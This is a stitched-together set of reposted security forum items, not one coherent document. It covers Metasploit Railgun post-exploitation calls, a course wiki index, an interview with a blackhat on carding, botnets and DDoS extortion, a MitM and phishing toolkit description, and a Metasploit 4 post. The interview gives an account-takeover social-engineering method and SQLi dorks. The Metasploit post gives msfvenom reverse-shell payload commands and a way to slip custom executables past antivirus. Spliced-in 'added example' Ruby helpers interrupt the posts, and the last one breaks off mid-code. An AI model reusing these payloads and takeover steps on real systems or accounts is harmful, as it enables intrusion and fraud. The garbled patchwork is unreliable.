Get all network interfaces. To verify the return type of the object, append .class at the end. In this case it’s an array.

```ruby
init = client.net.config.interfaces
init.each { |x| puts x.pretty }
```

The above are built-in calls. Using Railgun we can access the Windows API directly. The syntax would be:

    client.railgun.(DLL).(function)(arg 1, arg 2, …)

I will demonstrate some examples. So suppose I want to access the MessageBox function in the Windows API. It’s located in the “user32” DLL.
```c
int WINAPI MessageBox(
  _In_opt_ HWND    hWnd,
  _In_opt_ LPCTSTR lpText,
  _In_opt_ LPCTSTR lpCaption,
  _In_     UINT    uType
);
```

https://msdn.microsoft.com/en-us/library/windows/desktop/ms645505%28v=vs.85%29.aspx

To call the function we can type:

```
?> client.railgun.user32.MessageBoxA(0, "Hello World", "Osanda", "MB_ICONASTERISK | MB_OK" )
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>1}
```

If you want to lock the workstation you could use the “LockWorkStation” API.

```c
BOOL WINAPI LockWorkStation(void);
```

https://msdn.microsoft.com/en-us/library/windows/desktop/aa376875%28v=vs.85%29.aspx

```
?> client.railgun.user32.LockWorkStation()
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>true}
```

Suppose I want to terminate a process. For that I will be using the “OpenProcess” and “TerminateProcess” functions.

```c
HANDLE WINAPI OpenProcess(
  _In_ DWORD dwDesiredAccess,
  _In_ BOOL  bInheritHandle,
  _In_ DWORD dwProcessId
);
```

https://msdn.microsoft.com/en-us/library/windows/desktop/ms684320%28v=vs.85%29.aspx

```c
BOOL WINAPI TerminateProcess(
  _In_ HANDLE hProcess,
  _In_ UINT   uExitCode
);
```

https://msdn.microsoft.com/en-us/library/windows/desktop/ms686714%28v=vs.85%29.aspx

If I want to terminate the CMD running on the target machine, I’ll first get a handle with “PROCESS_TERMINATE” access, store the return value in a variable and then call the “TerminateProcess” API to terminate the process.
[TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7[/TD] [TD=class: code]?> client.railgun.kernel32.OpenProcess("PROCESS_TERMINATE", false, 3664) => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>4692} >> phandle = _['return'] => 4692 >> client.railgun.kernel32.TerminateProcess(phandle, 0) => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>true} >> [/TD] [/TR] [/TABLE] Likewise you could do cool stuff by directly accessing the API during runtime. Read the prototype of the function and apply accordingly using Railgun. If you want to find the functions loaded to Railgun in a specific DLL just get the exception error message and you will see the functions loaded. Now let’s try to add a new DLL which is not shipped by default into Railgun. To check the available DLL type. [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]?> client.railgun.known_dll_names => ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", "crypt32", "wlanapi", "wldap32", "version"] >> [/TD] [/TR] [/TABLE] Let’s try to add “mpr.dll” into Railgun at runtime and try to access a function. This would be the syntax. client.railgun.add_dll(Name, Path) To add “mpr.dll” we can enter like this: client.railgun.add_dll("mpr", "C:/windows/system32/mpr.dll") After that you should add the function. To view the functions of a DLL I will be using DLL Export Viewer by Nirsoft, feel free to use any utility you like. I would like to use the “WNetGetUserW” function. Let’s check the function from MSDN. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]DWORD WNetGetUser( _In_ LPCTSTR lpName, _Out_ LPTSTR lpUserName, _Inout_ LPDWORD lpnLength ); [/TD] [/TR] [/TABLE] https://msdn.microsoft.com/en-us/library/windows/desktop/aa385476%28v=vs.85%29.aspx We should follow the syntax of the Railgun. 
[TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]client.railgun.add_function("mpr", "WNetGetUserW", "DWORD", [ ["PWCHAR", "lpName", "in"], ["PWCHAR", "lpUserName", "out"], ["PDWORD", "lpnLength", "inout"] ]) [/TD] [/TR] [/TABLE] After adding the function we can run the function passing the arguments [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]>> client.railgun.mpr.WNetGetUserW(nil,50,50) => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>0, "username"=>"SYSTEM\x00AAAAAAAAAAAAAAAAAA", "lplen"=>50} [/TD] [/TR] [/TABLE] That is how you can access the Windows API using Railgun. For more info about editing modules read their documentation https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Railgun-for-Windows-post-exploitation MSDN is your friend. To play around with different APIs apply according to information provided by MSDN. Thanks for reading. Posted by Osanda Malith in pentesting Sursa: https://osandamalith.wordpress.com/2015/02/19/accessing-the-windows-api-directly/
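The prototype-to-add_function translation above is mechanical, so here is a small helper that does it, as an added example that is not code from the post or from Metasploit. It parses an MSDN prototype with SAL annotations and renders the exact irb line to paste. The Windows-typedef-to-Railgun-type table is an assumption and covers only common types; check any type you add against Railgun's own definitions before relying on it.

```ruby
# Added example (not from the original post or Metasploit): turn an MSDN
# prototype with SAL annotations into the argument list that
# client.railgun.add_function expects.
#
# Assumption: the Windows typedef -> Railgun type mapping below. Railgun's
# authoritative type list lives in its own definitions
# (lib/rex/post/meterpreter/extensions/stdapi/railgun); verify before use.
RAILGUN_TYPES = {
  'int' => 'DWORD', 'DWORD' => 'DWORD', 'UINT' => 'DWORD', 'ULONG' => 'DWORD', 'LONG' => 'DWORD',
  'BOOL' => 'BOOL',
  'HANDLE' => 'HANDLE', 'HWND' => 'HANDLE', 'HMODULE' => 'HANDLE', 'HKEY' => 'HANDLE',
  'LPCTSTR' => 'PWCHAR', 'LPTSTR' => 'PWCHAR', 'LPCWSTR' => 'PWCHAR', 'LPWSTR' => 'PWCHAR',
  'LPCSTR' => 'PCHAR', 'LPSTR' => 'PCHAR',
  'LPDWORD' => 'PDWORD', 'PDWORD' => 'PDWORD',
  'LPVOID' => 'LPVOID', 'PVOID' => 'LPVOID', 'LPBYTE' => 'PBLOB', 'PBYTE' => 'PBLOB',
  'PHANDLE' => 'PHANDLE', 'LPHANDLE' => 'PHANDLE'
}.freeze

# SAL annotation -> Railgun parameter direction.
DIRECTIONS = {
  'In' => 'in', 'In_opt' => 'in',
  'Out' => 'out', 'Out_opt' => 'out',
  'Inout' => 'inout', 'Inout_opt' => 'inout'
}.freeze

def railgun_type(win_type)
  RAILGUN_TYPES.fetch(win_type) { raise ArgumentError, "no Railgun mapping for #{win_type}" }
end

# "_Out_ LPTSTR lpUserName" -> ["PWCHAR", "lpUserName", "out"]
def parse_param(text)
  m = text.strip.match(/\A_(In_opt|In|Out_opt|Out|Inout_opt|Inout)_\s+(\w+)\s+(\w+)\z/)
  raise ArgumentError, "unparseable parameter: #{text.inspect}" unless m
  [railgun_type(m[2]), m[3], DIRECTIONS.fetch(m[1])]
end

# Whole prototype -> [function_name, return_type, params]
def parse_prototype(proto)
  flat = proto.gsub(/\s+/, ' ').strip.sub(/;\z/, '').strip
  m = flat.match(/\A(\w+) (?:WINAPI )?(\w+) ?\((.*)\)\z/)
  raise ArgumentError, "unparseable prototype: #{proto.inspect}" unless m
  args = m[3].strip
  params = (args.empty? || args == 'void') ? [] : args.split(',').map { |p| parse_param(p) }
  [m[2], railgun_type(m[1]), params]
end

# The irb line to paste into the Meterpreter session. export_name picks the
# real A/W export when the MSDN page shows the generic (macro) name.
def add_function_line(dll, proto, export_name: nil)
  name, ret, params = parse_prototype(proto)
  rendered = params.map { |p| '[' + p.map(&:inspect).join(', ') + ']' }.join(', ')
  "client.railgun.add_function(#{dll.inspect}, #{(export_name || name).inspect}, #{ret.inspect}, [#{rendered}])"
end

# Constructed input: the WNetGetUser prototype as quoted from MSDN in the post.
WNETGETUSER = <<~PROTO
  DWORD WNetGetUser(
    _In_    LPCTSTR lpName,
    _Out_   LPTSTR  lpUserName,
    _Inout_ LPDWORD lpnLength
  );
PROTO

puts add_function_line('mpr', WNETGETUSER, export_name: 'WNetGetUserW')
puts add_function_line('user32', 'BOOL WINAPI LockWorkStation(void);')
```

Paste the printed line into irb after add_dll; for functions that take both a generic name and A/W exports, pass export_name explicitly so the declaration matches the export Railgun will resolve.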
-
SystemProgramming

Welcome to Angrave's crowd-sourced System Programming wiki! This wiki is being built by students and faculty from UIUC. Rather than requiring a book this semester, we will build our own set of resources here.

Week 1
C Programming, Part 1: Introduction
C Programming, Part 2: Text Input And Output
Informal Glossary of basic terms
#Piazza: When And How to Ask For Help

Week 2
C Programming, Part 3: Common Gotchas
Forking, Part 1: Introduction
Forking, Part 2: Fork, Exec, Wait Kill

Week 3
Memory, Part 1: Heap Memory Introduction
Memory, Part 2: Implementing a Memory Allocator
Memory, Part 3: Smashing the Stack Example
Pthreads, Part 1: Introduction

Week 4
Pthreads, Part 2: Usage in Practice
Synchronization, Part 1: Mutex Locks
Synchronization, Part 2: Counting Semaphores

Week 5
Synchronization, Part 3: Working with Mutexes And Semaphores
Synchronization, Part 4: The Critical Section Problem
Synchronization, Part 5: Condition Variables

Week 6
Synchronization, Part 6: Implementing a barrier
Synchronization, Part 7: The Reader Writer Problem
Synchronization, Part 8: Ring Buffer Example
Synchronization, Part 9: The Reader Writer Problem (part 2)

Week 7
Deadlock, Part 1: Resource Allocation Graph
Deadlock, Part 2: Deadlock Conditions

Week 8
Todo: Analysis of Dining Philosophers (for now see the discussion section handout)
  * Breaking Circular Wait
  * Using a global mutex to break hold-and-wait
  * Beware of starvation if all philosophers hold their left chopstick and try+release their right chopstick
Virtual Memory, Part 1: Introduction to Virtual Memory
Pipes, Part 1: Introduction to pipes
Pipes, Part 2: Pipe programming secrets
Files, Part 1: Working with files

Week 9
POSIX, Part 1: Error handling
Networking, Part 1: Introduction
Networking, Part 2: Using getaddrinfo
Networking, Part 3: Building a simple TCP Client
Programming Tricks, Part 1

Week 10
Networking, Part 4: Building a simple TCP Server
Networking, Part 5: Reusing ports
Scheduling, Part 1: Scheduling Processes

Week 11
File System, Part 1: Introduction
File System, Part 2: Files are inodes (everything else is just data...)
File System, Part 3: Permissions

Week 12
File System, Part 4: Working with directories
File System, Part 5: Virtual file systems
File System, Part 6: Memory mapped files and Shared memory
File System, Part 7: Scalable and Reliable Filesystems
Networking, Part 6: Creating a UDP server

Week 13
Signals, Part 2: Pending Signals and Signal Masks
Signals, Part 3: Raising signals
Signals, Part 4: Sigaction

Week 14
File System, Part 8: Disk blocks example

Other content
C Programming, Part 4: Debugging
#Example Markdown

Legal and Licensing information: Unless otherwise specified, submitted content to the wiki must be original work (including text, java code, and media) and you provide this material under a Creative Commons License. If you are not the copyright holder, please give proper attribution and credit to existing content and ensure that you have license to include the materials.

Sursa: https://github.com/angrave/SystemProgramming/wiki
-
Read what is written in red.
-
Something like that. I don't know where the line is drawn. The ones with FinFisher are rich and free. The NSA likewise. The laws should be the same for everyone.
-
He has a permanent ban. You can talk to him at thesevensmarter@gmail.com
-
Interview With A Blackhat (Part 1)

[This interview openly discusses criminal activities from the perspective of an admitted criminal. You may find this content distressing, even offensive, but what is described in this interview is real. We know from personal experience that these activities are happening on websites everywhere, everyday, and perhaps even on your websites. WhiteHat Security brings this information to light for the sole purpose of assisting those who want to protect themselves on their online business.]

Over the last few years, I have made myself available to be an ear for the ‘blackhat community.’ The blackhat community, often referred to as the internet underground, is a label describing those participating on the other side of the [cyber] law, who willingly break online terms of service and software licensing agreements, who may trade in warez, exploits, botnets, credit card numbers, social security numbers, stolen account credentials, and so on. For these individuals, or groups of them, there is often a profit motive, but certainly not always.

Most of the time, the people I speak with in the information security industry understand the usefulness of engaging in dialog with the underground — even if it’s not something they feel comfortable doing themselves. However, I occasionally get questioned as to the rationale — the implication being that if you play with pigs you start to stink. People sometimes even begin to insinuate that one must be bad to know bad people. I think it is incredibly important for security experts to have open dialogues with the blackhat community. It’s not at all dissimilar to police officers talking with drug dealers on a regular basis as part of their job: if you don’t know your adversary you are almost certainly doomed to failure.

One ‘blackhat,’ who asked to be called Adam, that I have spoken to a lot has recently said he’s decided to go legit. During this life-changing transition, he offered to give an interview so that the rest of the security community could learn from his point of view. Not every blackhat wants to talk, for obvious reasons, so this is a rare opportunity to see the world through his eyes, even if we’re unable to verify any of the claims made. Hopefully by learning how Adam and other blackhats like him think, how they communicate, people can devise better solutions, abandon failed technologies, and fix the most glaring issues. Maybe people reading this can find more effective punishments to deter the criminal behavior before it happens, or ruin the incentives, disable the markets, or find ways to keep people from the allure of criminal activity in the first place. A great deal can be unearthed by examining Adam’s words and those of other blackhats like him. Or maybe we can entice some of them, like this individual, to leave the blackhat life behind completely.

Adam’s interview took place over a few days, and required a lot of back and forth. Due to the way in which this interview had to take place, a lot of editing was required to make it readable, but primarily to spelling, capitalization and punctuation. In every meaningful sense, these are Adam’s unaltered words. (Note that when Adam refers to “whitehats,” he is referring to legitimate hackers in general, and that this should not be confused with WhiteHat Security the business.)

This is the first of our three-part interview. The next post will be tomorrow.

Q: Can you describe what you think your hacking/security related skills are?

A: My personal expertise and area of knowledge is in social engineering. I think it is pretty obvious I’m a blackhat, so I social engineer to card. Another area of “hacking” (I use the ” as DDoS isn’t really hacking) is botnet building and takedown orders. This is where most money in my opinion is made — where one day can bring in several thousand dollars. The whole blackhat market has moved from manual spreading to fully automated software. In addition, many sites are targeted in malware/info leaks by using some really common and easy methods. These include SQLi, basic and advanced XSS, CSRF, and DNS cache poisoning. Although SQLi is still a big player, XSS has taken over the market. I estimate about 50-60% of the attacks my crew did last year (Jan 1st-Jan 1st) were XSS. I also learned several programming languages — Python, Perl, C, C++, C#, Ruby, SQL, PHP, ASP, just to name a few.

Q: Can you describe the first time you remember deliberately breaking a computer-related law? Why did you do it and how did you justify it?

A: Hmmmmm. That was many years ago. The first time I remember was when I was in school (aged about 14). The admins were pretty good at security (for school admins, bear in mind). I was in the library one day and I knew that the admins had remote access to every PC. I also knew the librarian did. The library just so happened to be the place where they marked our exam papers and entered the grades. I was never the genius at school but I was getting mediocre grades. What if I could get ‘A’s and ‘A+’s and not do half the work? So I started to read around. I eventually came across keyloggers. It seemed strange and amazing that a program I could make (with a little research) could get me the top grades. So I did it. I installed the keylogger onto the librarian’s PC and then used the remote administration program to download the file onto the other PCs. I was suspended for two weeks.

Q: Where did you learn the bulk of your skills?

A: Books, Google, and the people I began speaking with on irc/forums. Unlike today’s 1337 haxorz (lol) we all shared, spoke, and helped each other. There wasn’t a sense of being mocked because you didn’t know.

Q: What attracted you to the blackhat way of life?

A: Money. I found it funny how watching tv and typing on my laptop would earn me a hard worker’s monthly wage in a few hours. [it was] too easy in fact.

Q: Can you recall a tipping point at which you started considering yourself a blackhat? What was the nature of the event?

A: It’s difficult really. I and the guys/girls I hung with never called ourselves blackhats, I don’t know, it was just too James Bond like. We just saw ourselves as people who found a way to make money. We didn’t care about what category we were in. It was just easy and funny. Although saying that, I first realized I might be branded a blackhat when my “real life” friend became a victim of credit card fraud. That’s when I realized my actions had real victims and not just numbers that were worth money.

Q: How many machines do you think you directly controlled at the peak of your botnet activity?

A: Erm, depends. I had two separate botnets (although some bots cross over). The DDoS botnet contained the bots which were public computers or computers that were in offices. [There were] two reasons I did that. Either: 1. they are on for the majority of the day and have good connection speeds or 2. people weren’t stupid enough to do their banking on them (if you were I’d let a script kiddy have it). Then there was my carding botnet, definitely the most valuable. These were PCs of banks, estate agents, supermarkets and obviously home PCs. I preferred to target PCs where an employee would enter customer data, i.e. banks (yes banks are super easy to bot). This gave me a constant supply of credit cards and a never-ending amount of spam ammo. DDoS botnet has about 60-70k bots at the moment, most in the west. Carding botnet had a lot less at around 5-10k, most in Asia. 570k is the biggest I’ve controlled.

Q: How much money do you think you made after expenses per year at your peak doing blackhat activities?

A: I can’t really go into specifics but when 9/11 happened we were making millions.

Q: And how much do you think you made last year?

A: Off the top of my head? Around about 400-500k. Last year was kind of shit. People became wiser, patches became more frequent. This year we have 3/4 of that amount already.

Q: When you started, did you have a goal in mind to make a certain amount of money or achieve a certain goal?

A: I get asked this a lot by new people on the forums. I never set myself goals until probably in the last 4 years. I started it out just for easy laughs, bragging rights (lol) and easy, very easy money.

Q: Can you describe the process that you use to make money with your botnet?

A: Making money with a botnet is easier than brushing your teeth, especially if you’re in the automated industry. Any crew has several members. The bot master, researcher, reverse engineer, spreader, social engineer, sales man and fudder*. The people who sell 0-days are solely selling 0-days half the time. The buyers are bot masters without a crew. Our crew developed a tool that checks the bot’s cache for Facebook/twitter accounts then checks their Facebook interests (e.g. justin bieber), then age, name, location. So for example bot no. 2 is signed into Facebook. The account likes Justin Bieber, aged 14, female, and lives in America (important to get correct language). Then automatically it selects a pre made list of links and for example would choose the ‘Justin bieber sex tape video’. Using zero days to compromise a website, then insert an iframe is kinda old, boring and sometimes doesn’t bring in the best results — unless of course you’re hijacking a high Alexa rating; then it’s worth it. Combining 0-days to deface the website and then a 0-day in e.g. java to hijack with a drive by is a lot more effective than tracking the user into downloading a file. What a lot of people don’t realize is that emails easily available on their Facebook profile can be sold for spam. Again, this makes more money automatically.

* A fudder can be a tool that binds to a virus and makes it more difficult for antivirus to detect, or a person specializing in such a tool.

Q: How easy is it for you to compromise a website and take control over it?

A: For beginners you can simply Google inurl:money.php?id= — go ahead try it. But most of them will be cancelled or dried up. So, now you target bigger websites. I like to watch the news; especially the financial side of it. Say if a target just started up and it suddenly sky rocketed in online sales that’ll become a target. Most of these websites have admins behind them who have no practical experience of being the bad guy and how the bad guys think. This leaves them hugely vulnerable. They patch SQL but choose a DNS that is vulnerable to DNS cache poisoning. You can break in and be gone within an hour.

Q: How easy is it for you to take over the ownership of an account via whois information or other publicly available information?

A: Whois used to be crucial to gaining information. Now people spew it on Facebook, twitter, etc. Companies like Amazon only require name, address and email on the account to add another credit card. You then hang up. Ring the password reset department and tell them as verification the name, address, email and the credit card number you just added (it doesn’t even have to work (lol), just use fakenamegenerator.com) and then you are in. You can now see the ‘legit’ credit card’s last 4 digits. Now you can get an email password reset and you’re in. Amazon says they patched this two years ago but I use this method all the time. Seriously Amazon, train your staff.

Q: What is your favorite kind of website to compromise? Or are your hack attempts entirely untargeted? What are the easiest sites to monetize?

A: Most of the time un-targeted but once a company (which I won’t name) pissed me off for not giving me discount in a sale so we leaked every single credit card number online. One type of company I love to target is Internet security, i.e. anti virus companies. There is nothing better than a clothing store at the summer sales (except porn websites). These are in my personal opinion the easiest and most successful targets to breach. I’ll talk about clothes stores first. Clothing websites are SO easy because of two main types of attacks. 1. The admins never ever have two-step authentication. I don’t know why, but I have never seen one admin have it (and I’ve done it thousands of times). 2. The ‘admin’ usually works there behind the tills or in the offices. They have no clue what they’re doing: they just employ someone to make the website then they run it. They never ever have HTTPS, [so they have] huge SQLi vulnerabilities (e.g. inurl: product.php?id=). Once you have the SQLi vulnerability you can go two routes or both. Route one: steal the credit card info and leave. Route two: deface the website, keep the original HTML code but install an iframe that redirects to a drive by download of a banking Trojan. Now to discuss my personal favourite: porn sites. One reason why this is so easy: The admins don’t check to see what the adverts redirect to. Upload an ad of a well-endowed girl typing on Facebook, someone clicks, it does a drive by download again. But this is where it’s different: if you want extra details (for extortion if they’re a business man) you can use SET to get the actual Facebook details which, again, can be used in social engineering.

Q: What is your favorite/most effective exploit against websites and why?

A: If it’s a 0-day, that obviously ranks at the top. But below that is XSS. It’s really well known but no one patches it. I suppose DDoS isn’t really classed as an exploit but that can bring in monthly ‘rent’ for our ‘protection’. But over all 0-days are the greatest exploits.

Q: How do you monetize DDoS?

A: People buy accounts so for example you rent 1k bots and have a DDoS time limit of 30 mins. Some people buy one-offs. Black mail is a huge part of it. Take the website down for an hour. Email them or call them and say they pay 200 dollars or it stays offline for good. They usually pay up. If they don’t, they lose days, weeks, months of business.

Q: How do you pick targets to DDoS when you are attempting to extort them?

A: Hmmm. It depends. If there is a big sporting event, e.g. the Super Bowl, I can guarantee 95% of bookies have been extorted. I knew of one group who took down cancer research website and extorted them after their race for life donation process was meant to start. They got their money, kinda sad really.

Q: What kind of people tend to want to buy access to your botnet and/or what do you think they use it for?

A: Some people say governments use it, rivals in business. To be honest, I don’t care. If you pay you get a service. Simple.

Continue Reading Part 2

This entry was posted in Web Application Security on May 21, 2013 by Robert Hansen.

Sursa: https://blog.whitehatsec.com/interview-with-a-blackhat-part-1/
-
netool.sh V4.4
MitM PENTESTING OPENSOURCE T00LKIT v4.4 WIKI

The netool.sh toolkit provides a fast and easy way for newcomers to IT security pentesting, and for experienced users as well, to use almost all of the features that a Man-In-The-Middle position on a local LAN can provide: scanning, sniffing and social engineering attacks (spear phishing attacks).

DESCRIPTION
"Scanning - Sniffing - Social Engineering"

Netool: a toolkit written in bash, python and ruby that lets you automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. It makes tasks such as sniffing TCP/UDP traffic, Man-In-The-Middle attacks, SSL sniffing, DNS spoofing, DoS attacks on WAN/LAN networks and TCP/UDP packet manipulation with etter-filters easy, lets you capture the pictures the target's web browser is loading (driftnet), and uses macchanger to change the MAC address as a decoy while scanning.

Rootsector: a module that automates some attacks over DNS_SPOOF + MitM (phishing, social engineering) using the metasploit, apache2 and ettercap frameworks, such as generating payloads, shellcode and backdoors that are delivered by redirecting a target to your phishing web page through dns_spoof and the MitM position.

Recently the "inurlbr" web scanner (by Cleiton) was added. It searches for SQL-related bugs using several search engines, and it can be chained with other frameworks such as nmap through the --comand-vul flag, where _TARGET_ is replaced with each hit. Example:

inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27 -s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

* STABLE repository | GIT repository | CHANGELOG | BUG-REPORTS

Operating systems supported
Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS
Linux-backtrack (discontinued) | Mac OS X (discontinued)

"REMARK" The 'opensource-kali' project was built to work on most pentesting distros (blackbox, parrot, backtrack, kali, etc.) with little configuration needed: install the toolkit in the right path, set executable permissions on all files, and configure the paths to the dependencies (in the "toolkit_config" file). So it is the obvious choice if you want to install the toolkit on a distro other than Ubuntu or Kali.

* UBUNTU install | KALI install | OTHER DISTROS install | UNIVERSAL INSTALLER

Dependencies
"TOOLKIT DEPENDENCIES" zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip
"SCANNER INURLBR.php" curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl

* Install zenity | Install nmap | Install ettercap | Install macchanger | Install metasploit | Install Apache2

Credits
x0ra-machine "Pentesting Lab" | Apofis Kaizer "Debug on Mac OSx"
Fyodor "Nmap" | ALoR & NaGa "Ettercap" | HD moore "Metasploit"
Moxie M "Sslstrip" | Chris L "Driftnet" | j0rgan "Cupp.py"
Cleiton p "inurlbr.php" | ReL1K "unicorn.py"

"Developed by: pedr0 Ubuntu [r00t-3xp10it]"
Suspicious Shell Activity Labs@2014 | r00tsect0r CyberTeam Red Team Collaborations

Sursa: http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/
-
Custom payloads in Metasploit 4

One of the key features of Metasploit is how customizable the framework is: payloads can be generated with many different options and placed in any of a large number of exploits, and custom scripts with many commands can automate post-exploitation actions. Nevertheless, a number of customizations have remained awkward to implement. Most of them involve adding a payload that isn't in the framework, or modifying one in a way the framework does not directly support. So for Metasploit 4 I made a few tweaks to increase payload flexibility.

Generic/custom

The first change was the addition of a single custom payload, generic/custom. Before this, a custom payload existed for command-execution exploits on UNIX (payload/cmd/unix/generic), but there was no analogous payload for command-execution exploits on Windows, or for that matter for any other architecture or platform. If you are developing a payload that could benefit from Metasploit integration, writing a payload module is still preferable. But in some cases, such as generating multiple payloads, Metasploit may not yet have the UI or backend to build the payload the conventional way, and you may want to import it from a file or an option. And while writing a payload, it can be easier to import it into the framework than to change a module.

Multipayloads

The second change makes it easier to combine multiple payloads into one exploit, since you may not get a second chance to exploit the target service, get the user to open a malicious document, and so on. The first step towards letting the framework build one payload out of several was the "none" exitfunc. Most Windows payloads accept the EXITFUNC option. It sets a function hash in the payload that selects the DLL and function to call when the payload is complete; usually it is "thread" or "process", corresponding to ExitThread or ExitProcess. I added "none", which calls GetLastError, effectively a no-op. The thread then keeps executing past the end of the payload, so you can simply cat several payloads together to run them in series:

msfvenom -p windows/shell_reverse_tcp -f raw -e generic/none LHOST=192.168.1.2 LPORT=5555 EXITFUNC=none > pay.raw
msfvenom -p windows/shell_reverse_tcp -f raw -e generic/none LHOST=192.168.1.2 LPORT=4444 EXITFUNC=none >> pay.raw
msfvenom -f exe -p - > msf.exe < pay.raw

For some reason that didn't work in my XP VM, but it worked fine in my Windows 7 VM: when the first reverse shell either failed, or ran and the shell exited, the second reverse shell started. This doesn't help you if the first payload hangs, but it's a start.

The bigger problem is that many payloads don't have a clean execution path after the exitfunc. For example, windows/exec places the exitfunc block before the command string it executes, so instead of falling through to the next payload, the CPU tries to execute the ASCII command as x86 instructions. This fails badly.

Parallel multipayloads

The solution is to run payloads in parallel, using roughly the same technique as the exe payload-injection code (the -x template and -k keep options in msfvenom and msfencode), which injects a payload into an existing exe to run in a new thread while the original exe code continues to run normally. With the new -c option, the payload you are generating runs in a new thread while the shellcode in the file given to -c runs in the main thread. You can keep adding payloads to run in parallel with further invocations.

$ ruby msfvenom -h
Usage: msfvenom [options]
Options:
...
    -c, --add-code [path]     Specify an additional win32 shellcode file to include
    -x, --template [path]     Specify a custom executable file to use as a template
    -k, --keep                Preserve the template behavior and inject the payload as a new thread
...

$ ruby msfvenom -p windows/messagebox -f raw EXITFUNC=thread > /tmp/msgbox.raw
$ ruby msfvenom -p windows/meterpreter/reverse_tcp -f exe -c /tmp/msgbox.raw LHOST=192.168.0.102 EXITFUNC=thread > /tmp/rev102msgbox.exe

This generates an executable that runs a messagebox payload in one thread while a reverse-connect Meterpreter is spawned in another thread.

Custom executables

The last change came in response to a number of requests to use a custom executable with the psexec exploit, which generates an executable, drops it on the target system and executes it. Since some antivirus products block Metasploit-generated executables, yet it is not difficult to build an undetected executable by hand, it makes sense to let exploits like psexec use an external exe as the payload. This was implemented in the exe mixin used by executable-dropping exploits, so it is available in all similar exploits as well. The option is the advanced option EXE::Custom.

       =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 725 exploits - 367 auxiliary - 78 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
       =[ svn r13559 updated today (2011.08.14)

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set EXE::Custom /tmp/mypayload.exe
EXE::Custom => /tmp/mypayload.exe

... and proceed normally, without being bothered by pesky antivirus.

Sursa: Custom payloads in Metasploit 4 « Thoughts on Security
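Before concatenating two raw payloads as in the multipayload section, it helps to confirm which exitfunc each blob was actually built with. The following is an added example, not code from the post or from Metasploit: it computes the ROR13 API hashes that Metasploit's Windows block_api stub resolves at runtime (module name upper-cased as UTF-16LE including its terminator, function name as ASCII including its terminator, each byte folded with ror 13, the two sums added mod 2^32) and scans a blob for the "push imm32; call ebp" sequences through which Metasploit payloads invoke those APIs. The sample payload bytes are constructed for the example; the hash constants it checks against are the well-known block_api values.

```ruby
# Added example (not from the original post or Metasploit): ROR13 API hashes
# as used by Metasploit's x86 block_api, plus a scanner that reports which
# API calls (and therefore which EXITFUNC) a raw payload blob contains.

MASK = 0xFFFFFFFF

def ror13(value)
  ((value >> 13) | (value << 19)) & MASK
end

# Fold a byte sequence: h = ror13(h) + b for every byte, 32-bit wraparound.
def hash_bytes(bytes)
  bytes.reduce(0) { |h, b| (ror13(h) + b) & MASK }
end

# api_hash("kernel32.dll", "ExitProcess") == 0x56A2B5F0
def api_hash(mod, func)
  mod_bytes  = (mod.upcase + "\x00").each_char.flat_map { |c| [c.ord, 0] }  # UTF-16LE + terminator
  func_bytes = (func + "\x00").bytes                                          # ASCII + terminator
  (hash_bytes(mod_bytes) + hash_bytes(func_bytes)) & MASK
end

# Hash -> "module!function" for the APIs that matter when chaining payloads.
KNOWN_APIS = [
  ['kernel32.dll', 'ExitProcess'], ['kernel32.dll', 'ExitThread'],
  ['kernel32.dll', 'GetLastError'], ['kernel32.dll', 'LoadLibraryA'],
  ['kernel32.dll', 'WinExec'], ['kernel32.dll', 'CreateThread'],
  ['ws2_32.dll', 'WSAStartup'], ['ws2_32.dll', 'WSASocketA'], ['ws2_32.dll', 'connect']
].each_with_object({}) { |(m, f), table| table[api_hash(m, f)] = "#{m}!#{f}" }.freeze

# Exit API -> EXITFUNC name; "none" calls GetLastError as described in the post.
EXIT_FUNCS = {
  'kernel32.dll!ExitProcess'  => 'process',
  'kernel32.dll!ExitThread'   => 'thread',
  'kernel32.dll!GetLastError' => 'none'
}.freeze

# Finds every "push imm32 / call ebp" (68 xx xx xx xx ff d5) in a binary blob.
def find_api_calls(blob, table = KNOWN_APIS)
  blob = blob.b
  calls = []
  i = 0
  while (i = blob.index("\x68".b, i)) && i + 7 <= blob.bytesize
    if blob.byteslice(i + 5, 2) == "\xFF\xD5".b
      h = blob.byteslice(i + 1, 4).unpack('V').first
      calls << { offset: i, hash: h, name: table.fetch(h, format('unknown(0x%08X)', h)) }
    end
    i += 1
  end
  calls
end

# Which EXITFUNC the blob was generated with, or nil if no exit call is present.
def exit_function(blob)
  find_api_calls(blob).map { |c| EXIT_FUNCS[c[:name]] }.compact.first
end

# Encodes "push <hash>; call ebp" the way block_api callers do.
def push_call(hash)
  "\x68".b + [hash].pack('V') + "\xFF\xD5".b
end

# Constructed sample: a stub prologue, a LoadLibraryA call, filler, then ExitProcess.
SAMPLE_PAYLOAD = "\xFC\xE8\x82\x00\x00\x00".b +
                 push_call(api_hash('kernel32.dll', 'LoadLibraryA')) +
                 ("\x90".b * 3) +
                 push_call(api_hash('kernel32.dll', 'ExitProcess'))

if $PROGRAM_NAME == __FILE__
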